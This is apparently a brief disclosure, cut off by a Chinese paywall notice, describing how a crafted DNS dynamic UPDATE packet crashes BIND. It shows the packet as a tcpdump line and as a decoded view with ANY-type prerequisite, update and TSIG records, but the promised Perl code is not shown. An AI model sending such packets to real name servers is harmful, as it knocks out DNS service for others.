bind can be crashed with an update packet:
Packet in tcpdump:
15:38:11.676045 IP (tos 0x0, ttl 64, id 0, offset 0, flags [DF], proto: UDP (17), length: 178) 10.2.0.205.59447 > 10.2.0.205.53: 17378 update [1a] [1n] [1au] SOA? 8.0.10.in-addr.arpa. 8.8.0.10.in-addr.arpa. ANY ns: [|domain]
Another view of the Packet:
| ;; HEADER SECTION
| ;; id = 181
| ;; qr = 0 opcode = UPDATE rcode = NOERROR
| ;; zocount = 1 prcount = 1 upcount = 1 adcount = 1
|
| ;; ZONE SECTION (1 record)
| ;; 8.0.10.in-addr.arpa. IN SOA
|
| ;; PREREQUISITE SECTION (1 record)
| 4.8.0.10.in-addr.arpa. 0 IN ANY ; no data
|
| ;; UPDATE SECTION (1 record)
| 4.8.0.10.in-addr.arpa. 0 ANY ANY ; no data
|
| ;; ADDITIONAL SECTION (1 record)
| office.example.com. 0 ANY TSIG HMAC-MD5.SIG-ALG.REG.INT. NOERROR
Such a packet can be created with perl:
-----------------
本内容试读结束,登录后可阅读更多
下载后可阅读完整内容,剩余2页未读,立即下载